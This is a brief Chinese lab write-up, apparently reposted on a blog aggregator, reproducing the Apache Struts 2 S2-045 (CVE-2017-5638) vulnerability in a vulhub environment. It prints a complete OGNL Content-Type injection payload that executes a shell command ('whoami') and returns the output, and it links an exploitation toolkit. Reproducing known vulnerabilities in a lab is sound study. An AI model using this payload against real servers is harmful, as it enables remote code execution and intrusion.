CVE-2017-5638 S2-045复现

本文主要是介绍CVE-2017-5638 S2-045复现，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

0X00-引言

水文一篇，困了

0X01-环境搭建

靶机：CentOS Linux 7

攻击机：windows server 2016 && Kail

环境：vulhub

项目地址：https://github.com/vulhub/vulhub

搭建vulhub请访问：空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述

Apache Struts 2被曝存在远程命令执行漏洞，漏洞编号S2-045，CVE编号CVE-2017-5638，在使用基于Jakarta插件的文件上传功能时，有可能存在远程命令执行，导致系统被黑客入侵。
恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞，进而执行系统命令。

0X03-漏洞复现

01-任意命令执行

POC：

Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

burpsuite抓包-repeater-修改

0X04-工具利用

工具地址：https://github.com/Liqunkit/LiqunKit_

01-检测

02-命令执行

03-文件上传

失败

0X05-漏洞分析

略

0X06-查看日志

未找到log文件

0X07-参考

Struts-S2-045漏洞利用

这篇关于CVE-2017-5638 S2-045复现的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！